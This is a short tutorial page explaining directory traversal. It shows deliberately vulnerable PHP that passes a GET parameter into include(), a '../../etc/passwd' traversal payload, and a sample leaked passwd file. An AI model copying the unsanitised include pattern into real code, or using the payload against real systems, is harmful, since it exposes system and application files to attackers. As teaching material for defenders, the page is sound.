Directory Traversal
===================

Directory Traversal is an attack where an application takes in user input and uses it improperly in a directory path. This results in the attacker being able to access unintended or restricted directories.

For example, consider an application that allows the user to choose what page to load from a GET parameter.

.. code-block:: php

    <?php
        $page = $_GET['page']; // index.php
        include("/var/www/html/" . $page);
    ?>


Under normal operation the page would be ``index.php``. But what if a malicious user gave in something different?

.. code-block:: php

    <?php
        $page = $_GET['page']; // ../../../../../../../../etc/passwd
        include("/var/www/html/" . $page);
    ?>


Here the user is submitting ``../../../../../../../../etc/passwd``.

This will result in the PHP interpreter leaving the directory that it is coded to look in ('/var/www/html') and instead be forced up to the root folder.

.. code-block:: php

    include("/var/www/html/../../../../../../../../etc/passwd");

.. note::
    No matter how many ``../`` entries there are, you cannot go beyond the top directory. This can be used as a means of forcing your exploit to the top directory.


Ultimately this will become ``/etc/passwd`` and the application will load the ``/etc/passwd`` file and emit it to the user like so:

::

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
    systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
    systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
    systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
    _apt:x:104:65534::/nonexistent:/bin/false


This same concept can be applied to applications where some input is taken from a user and then used to access a file or path or similar. This vulnerability very often can be used to leak sensitive data or extract application source code to find other vulnerabilities.